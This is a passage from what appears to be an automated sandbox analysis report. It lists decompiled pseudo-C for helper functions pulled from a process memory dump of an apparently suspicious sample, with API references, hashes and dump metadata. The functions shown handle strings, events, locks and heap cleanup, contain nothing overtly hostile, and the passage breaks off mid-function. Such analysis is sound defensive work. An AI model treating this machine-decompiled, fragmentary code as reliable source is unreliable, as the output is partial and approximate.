                                                                                                                                                                                              0x00df48ef

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DF4DBF,00000000,?,?,00DF52FE,?,04C095B0), ref: 00DF4863
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DF487B
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00DF4DBF,00000000,?,?,00DF52FE,?,04C095B0), ref: 00DF48BF
                                                                                                                                                                                              • memcpy.NTDLL(00000001,?,00000001), ref: 00DF48E0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1819133394-0
                                                                                                                                                                                              • Opcode ID: 03627b846d900292d05d1bf52b3ceaccc43fe22083fb974f8ac06d8a465df252
                                                                                                                                                                                              • Instruction ID: 4ff7723c6e8f5ee5d29bb7015c9cbe3b86da25fe5f1d2e3ece11d5f9757b0f33
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03627b846d900292d05d1bf52b3ceaccc43fe22083fb974f8ac06d8a465df252
                                                                                                                                                                                              • Instruction Fuzzy Hash: EC11E372A00218ABC3108B69DD85DAFBFAADB80390B0A8166F604D7250EB749E00D7B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                              			E00DF6AF7(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				char* _t18;
                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t19 = 0x27;
                                                                                                                                                                                              				_t1 =  &_v20; // 0x74666f53
                                                                                                                                                                                              				_t18 = 0;
                                                                                                                                                                                              				E00DF6F89(_t8, _t1);
                                                                                                                                                                                              				_t16 = E00DF58BE(_t19);
                                                                                                                                                                                              				if(_t16 != 0) {
                                                                                                                                                                                              					_t3 =  &_v20; // 0x74666f53
                                                                                                                                                                                              					_t13 = E00DF9038(_t3, _t16, _a8);
                                                                                                                                                                                              					if(_a4 != 0) {
                                                                                                                                                                                              						__imp__(_a4);
                                                                                                                                                                                              						_t19 = _t13 + 0x27;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t18 = E00DF58BE(_t19);
                                                                                                                                                                                              					if(_t18 != 0) {
                                                                                                                                                                                              						 *_t18 = 0;
                                                                                                                                                                                              						if(_a4 != 0) {
                                                                                                                                                                                              							__imp__(_t18, _a4);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__imp__(_t18, _t16);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00DF147E(_t16);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t18;
                                                                                                                                                                                              			}









                                                                                                                                                                                              0x00df6b02
                                                                                                                                                                                              0x00df6b03
                                                                                                                                                                                              0x00df6b06
                                                                                                                                                                                              0x00df6b08
                                                                                                                                                                                              0x00df6b13
                                                                                                                                                                                              0x00df6b17
                                                                                                                                                                                              0x00df6b1c
                                                                                                                                                                                              0x00df6b20
                                                                                                                                                                                              0x00df6b28
                                                                                                                                                                                              0x00df6b2d
                                                                                                                                                                                              0x00df6b35
                                                                                                                                                                                              0x00df6b35
                                                                                                                                                                                              0x00df6b3e
                                                                                                                                                                                              0x00df6b42
                                                                                                                                                                                              0x00df6b48
                                                                                                                                                                                              0x00df6b4b
                                                                                                                                                                                              0x00df6b51
                                                                                                                                                                                              0x00df6b51
                                                                                                                                                                                              0x00df6b59
                                                                                                                                                                                              0x00df6b59
                                                                                                                                                                                              0x00df6b60
                                                                                                                                                                                              0x00df6b60
                                                                                                                                                                                              0x00df6b6b

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                                • Part of subcall function 00DF9038: wsprintfA.USER32 ref: 00DF9094
                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00DF2098,74666F53,00000000,?,00DFD00C,?,?), ref: 00DF6B2D
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00DF6B51
                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DF6B59
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                              • String ID: Soft
                                                                                                                                                                                              • API String ID: 393707159-3753413193
                                                                                                                                                                                              • Opcode ID: a682560f1a73c6a732e09ad95513cf937ef8df917e60047b5b4a630219e14c2f
                                                                                                                                                                                              • Instruction ID: 184600f196625cf80e05a62b114d201afd52dd23a3003adccf08bd73d3930e56
                                                                                                                                                                                              • Opcode Fuzzy Hash: a682560f1a73c6a732e09ad95513cf937ef8df917e60047b5b4a630219e14c2f
                                                                                                                                                                                              • Instruction Fuzzy Hash: BB01843250020DBACB122BA89C85EBE7A6CDF84385F06C120F70496105DB35C95587B1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF7283(void* __esi) {
                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v4 = 0;
                                                                                                                                                                                              				memset(__esi, 0, 0x38);
                                                                                                                                                                                              				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                              				 *(__esi + 0x1c) = _t8;
                                                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                                                              					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                              					 *(__esi + 0x20) = _t10;
                                                                                                                                                                                              					if(_t10 == 0) {
                                                                                                                                                                                              						CloseHandle( *(__esi + 0x1c));
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_v4 = 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v4;
                                                                                                                                                                                              			}






                                                                                                                                                                                              0x00df728d
                                                                                                                                                                                              0x00df7291
                                                                                                                                                                                              0x00df72a6
                                                                                                                                                                                              0x00df72a8
                                                                                                                                                                                              0x00df72ad
                                                                                                                                                                                              0x00df72b3
                                                                                                                                                                                              0x00df72b5
                                                                                                                                                                                              0x00df72ba
                                                                                                                                                                                              0x00df72c5
                                                                                                                                                                                              0x00df72bc
                                                                                                                                                                                              0x00df72bc
                                                                                                                                                                                              0x00df72bc
                                                                                                                                                                                              0x00df72ba
                                                                                                                                                                                              0x00df72d3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 00DF7291
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 00DF72A6
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00DF72B3
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00DF72C5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2812548120-0
                                                                                                                                                                                              • Opcode ID: 5f855d2cfe6fca7e22d48c19fa6e301382ea32db7ffca5a14df156f6634f7c3d
                                                                                                                                                                                              • Instruction ID: 9d483a3ff2df6af98b971d583c690470fee9da10d9162046147b9d856edba8a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f855d2cfe6fca7e22d48c19fa6e301382ea32db7ffca5a14df156f6634f7c3d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0F4B110430CBFD3105F65DCC5C3BBB9CEB552A8B16C92EF14281511DA71A9158A74
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00DFA2EF(int __eax, char _a4) {
                                                                                                                                                                                              				void* _v0;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				int _t13;
                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 =  &_a4; // 0x4d283a53
                                                                                                                                                                                              				_t14 = __eax;
                                                                                                                                                                                              				__imp__( *_t1);
                                                                                                                                                                                              				_t13 = __eax;
                                                                                                                                                                                              				if(__eax > __eax) {
                                                                                                                                                                                              					_t14 = __eax;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t2 = _t14 + 1; // 0x1
                                                                                                                                                                                              				_t12 = E00DF58BE(_t2);
                                                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                                                              					memcpy(_t12, _v0, _t13);
                                                                                                                                                                                              					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                              			}







                                                                                                                                                                                              0x00dfa2f2
                                                                                                                                                                                              0x00dfa2f6
                                                                                                                                                                                              0x00dfa2f8
                                                                                                                                                                                              0x00dfa2fe
                                                                                                                                                                                              0x00dfa302
                                                                                                                                                                                              0x00dfa304
                                                                                                                                                                                              0x00dfa304
                                                                                                                                                                                              0x00dfa306
                                                                                                                                                                                              0x00dfa30f
                                                                                                                                                                                              0x00dfa313
                                                                                                                                                                                              0x00dfa31b
                                                                                                                                                                                              0x00dfa32a
                                                                                                                                                                                              0x00dfa32f
                                                                                                                                                                                              0x00dfa337

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlen.KERNEL32(S:(M,00000000,750DD3B0,?,00DF9AA8,00000000,00000005,00DFD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 00DFA2F8
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,00DF4A8B,?,?,?,4D283A53,?,?), ref: 00DFA31B
                                                                                                                                                                                              • memset.NTDLL ref: 00DFA32A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlenmemcpymemset
                                                                                                                                                                                              • String ID: S:(M
                                                                                                                                                                                              • API String ID: 4042389641-2217774225
                                                                                                                                                                                              • Opcode ID: a5d6cdac022cd2a08aefaa585e66a98336e449ea01403c10295baf46926efd91
                                                                                                                                                                                              • Instruction ID: d80bce46f8d6590aac8b3e4674e3a81cfbfafc335e47b128ebb18666b76c716e
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5d6cdac022cd2a08aefaa585e66a98336e449ea01403c10295baf46926efd91
                                                                                                                                                                                              • Instruction Fuzzy Hash: 43E0E5B3A053296BC630AAF85C89D6F2ADCDBC4350B068425FB09C3205EA60CC1486B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF78AD() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              				intOrPtr _t5;
                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 =  *0xdfd26c; // 0x3c4
                                                                                                                                                                                              				if(_t1 == 0) {
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				SetEvent(_t1);
                                                                                                                                                                                              				_t11 = 0x7fffffff;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					SleepEx(0x64, 1);
                                                                                                                                                                                              					_t5 =  *0xdfd2b8; // 0x0
                                                                                                                                                                                              					if(_t5 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t11 = _t11 - 0x64;
                                                                                                                                                                                              					if(_t11 > 0) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					break;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t6 =  *0xdfd26c; // 0x3c4
                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t7 =  *0xdfd238; // 0x4810000
                                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                                              					HeapDestroy(_t7);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                              			}








                                                                                                                                                                                              0x00df78ad
                                                                                                                                                                                              0x00df78b4
                                                                                                                                                                                              0x00df78fe
                                                                                                                                                                                              0x00df7900
                                                                                                                                                                                              0x00df7900
                                                                                                                                                                                              0x00df78b8
                                                                                                                                                                                              0x00df78be
                                                                                                                                                                                              0x00df78c3
                                                                                                                                                                                              0x00df78c7
                                                                                                                                                                                              0x00df78cd
                                                                                                                                                                                              0x00df78d4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df78d6
                                                                                                                                                                                              0x00df78db
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df78db
                                                                                                                                                                                              0x00df78dd
                                                                                                                                                                                              0x00df78e5
                                                                                                                                                                                              0x00df78e8
                                                                                                                                                                                              0x00df78e8
                                                                                                                                                                                              0x00df78ee
                                                                                                                                                                                              0x00df78f5
                                                                                                                                                                                              0x00df78f8
                                                                                                                                                                                              0x00df78f8
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEvent.KERNEL32(000003C4,00000001,00DF6F2D), ref: 00DF78B8
                                                                                                                                                                                              • SleepEx.KERNEL32(00000064,00000001), ref: 00DF78C7
                                                                                                                                                                                              • CloseHandle.KERNEL32(000003C4), ref: 00DF78E8
                                                                                                                                                                                              • HeapDestroy.KERNEL32(04810000), ref: 00DF78F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4109453060-0
                                                                                                                                                                                              • Opcode ID: 650f776dbd92413c81ce85e07d32d2f9dfabfce6b9349d9fcf00a271387f1e1c
                                                                                                                                                                                              • Instruction ID: 1944d2afcb5b6b9cc506ff9f8c847638fb5579167c63e933093c4ba4805a9e52
                                                                                                                                                                                              • Opcode Fuzzy Hash: 650f776dbd92413c81ce85e07d32d2f9dfabfce6b9349d9fcf00a271387f1e1c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 74F08C31A09309EBD6105B789E4CFB63B9AAB04791B19C220BD00D73A0CF20CC01D6B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E00DF4C3A(void** __esi) {
                                                                                                                                                                                              				char* _v0;
                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void** _t14;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t14 = __esi;
                                                                                                                                                                                              				_t4 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				__imp__(_t4 + 0x40);
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t6 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                              					if( *_t1 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					Sleep(0xa);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t8 =  *_t14;
                                                                                                                                                                                              				if(_t8 != 0 && _t8 != 0xdfd030) {
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _t8);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t14[1] = E00DF7C75(_v0, _t14);
                                                                                                                                                                                              				_t11 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				_t12 = _t11 + 0x40;
                                                                                                                                                                                              				__imp__(_t12);
                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                              			}










                                                                                                                                                                                              0x00df4c3a
                                                                                                                                                                                              0x00df4c3a
                                                                                                                                                                                              0x00df4c43
                                                                                                                                                                                              0x00df4c53
                                                                                                                                                                                              0x00df4c53
                                                                                                                                                                                              0x00df4c58
                                                                                                                                                                                              0x00df4c5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df4c4d
                                                                                                                                                                                              0x00df4c4d
                                                                                                                                                                                              0x00df4c5f
                                                                                                                                                                                              0x00df4c63
                                                                                                                                                                                              0x00df4c75
                                                                                                                                                                                              0x00df4c75
                                                                                                                                                                                              0x00df4c85
                                                                                                                                                                                              0x00df4c88
                                                                                                                                                                                              0x00df4c8d
                                                                                                                                                                                              0x00df4c91
                                                                                                                                                                                              0x00df4c97

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(04C09570), ref: 00DF4C43
                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,?,?,00DF4A8B,?,?,?,4D283A53,?,?), ref: 00DF4C4D
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,00DF4A8B,?,?,?,4D283A53,?,?), ref: 00DF4C75
                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(04C09570), ref: 00DF4C91
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 58946197-0
                                                                                                                                                                                              • Opcode ID: 863281523c5ce506341f66898344c49659d6e43751b22fbce8a2d18906f4f859
                                                                                                                                                                                              • Instruction ID: 510efd37f26216477ff41c88126297af366e818f36dffa60dc0c207e9bc789fa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 863281523c5ce506341f66898344c49659d6e43751b22fbce8a2d18906f4f859
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AF0DA70611344DBD7209F68EE48F3677E6AB24745B06D404FA42C6365DB20D951DA39
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                                                              			E00DF9B10() {
                                                                                                                                                                                              				void* _v0;
                                                                                                                                                                                              				void** _t3;
                                                                                                                                                                                              				void** _t5;
                                                                                                                                                                                              				void** _t7;
                                                                                                                                                                                              				void** _t8;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t3 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				__imp__( &(_t3[0x10]));
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t5 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                              					if( *_t1 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					Sleep(0xa);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t7 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				_t10 =  *_t7;
                                                                                                                                                                                              				if(_t10 != 0 && _t10 != 0xdfe845) {
                                                                                                                                                                                              					HeapFree( *0xdfd238, 0, _t10);
                                                                                                                                                                                              					_t7 =  *0xdfd324; // 0x4c095b0
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_t7 = _v0;
                                                                                                                                                                                              				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                              				__imp__(_t8);
                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                              			}









                                                                                                                                                                                              0x00df9b10
                                                                                                                                                                                              0x00df9b19
                                                                                                                                                                                              0x00df9b29
                                                                                                                                                                                              0x00df9b29
                                                                                                                                                                                              0x00df9b2e
                                                                                                                                                                                              0x00df9b33
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9b23
                                                                                                                                                                                              0x00df9b23
                                                                                                                                                                                              0x00df9b35
                                                                                                                                                                                              0x00df9b3a
                                                                                                                                                                                              0x00df9b3e
                                                                                                                                                                                              0x00df9b51
                                                                                                                                                                                              0x00df9b57
                                                                                                                                                                                              0x00df9b57
                                                                                                                                                                                              0x00df9b60
                                                                                                                                                                                              0x00df9b62
                                                                                                                                                                                              0x00df9b66
                                                                                                                                                                                              0x00df9b6c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(04C09570), ref: 00DF9B19
                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,?,?,00DF4A8B,?,?,?,4D283A53,?,?), ref: 00DF9B23
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00DF4A8B,?,?,?,4D283A53,?,?), ref: 00DF9B51
                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(04C09570), ref: 00DF9B66
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 58946197-0
                                                                                                                                                                                              • Opcode ID: 266b112c3546d4be7c768d47e3a159a74ff2605eb2e70f6c76a9d27d8810ba70
                                                                                                                                                                                              • Instruction ID: 8b5e019ae0a2d497bc8710c3d77b629b66670cc2050cbe34e6cc9e58e0dfa1d1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 266b112c3546d4be7c768d47e3a159a74ff2605eb2e70f6c76a9d27d8810ba70
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9F0DA74A00304DBEB189B54EE99F3577E6EB18301B06C018EA02C7374C630EC51CA35
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E00DF6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                              				char* _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                              				int _t42;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t17 = __eax;
                                                                                                                                                                                              				_t37 = 0;
                                                                                                                                                                                              				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                              				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                              				_t28 = _t2;
                                                                                                                                                                                              				_t34 = E00DF58BE(_t2);
                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                              					_t30 = E00DF58BE(_t28);
                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                              						E00DF147E(_t34);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t39 = _a4;
                                                                                                                                                                                              						_t22 = E00DFA8D2(_t39);
                                                                                                                                                                                              						_v8 = _t22;
                                                                                                                                                                                              						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                              							_a4 = _t39;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t26 = _t22 + 2;
                                                                                                                                                                                              							_a4 = _t22 + 2;
                                                                                                                                                                                              							_t22 = E00DFA8D2(_t26);
                                                                                                                                                                                              							_v8 = _t22;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t22 == 0) {
                                                                                                                                                                                              							__imp__(_t34, _a4);
                                                                                                                                                                                              							 *_t30 = 0x2f;
                                                                                                                                                                                              							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t42 = _t22 - _a4;
                                                                                                                                                                                              							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                              							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                              							__imp__(_t30, _v8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *_a8 = _t34;
                                                                                                                                                                                              						_t37 = 1;
                                                                                                                                                                                              						 *_a12 = _t30;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                              			}














                                                                                                                                                                                              0x00df6b6e
                                                                                                                                                                                              0x00df6b78
                                                                                                                                                                                              0x00df6b7a
                                                                                                                                                                                              0x00df6b80
                                                                                                                                                                                              0x00df6b80
                                                                                                                                                                                              0x00df6b89
                                                                                                                                                                                              0x00df6b8d
                                                                                                                                                                                              0x00df6b99
                                                                                                                                                                                              0x00df6b9d
                                                                                                                                                                                              0x00df6c11
                                                                                                                                                                                              0x00df6b9f
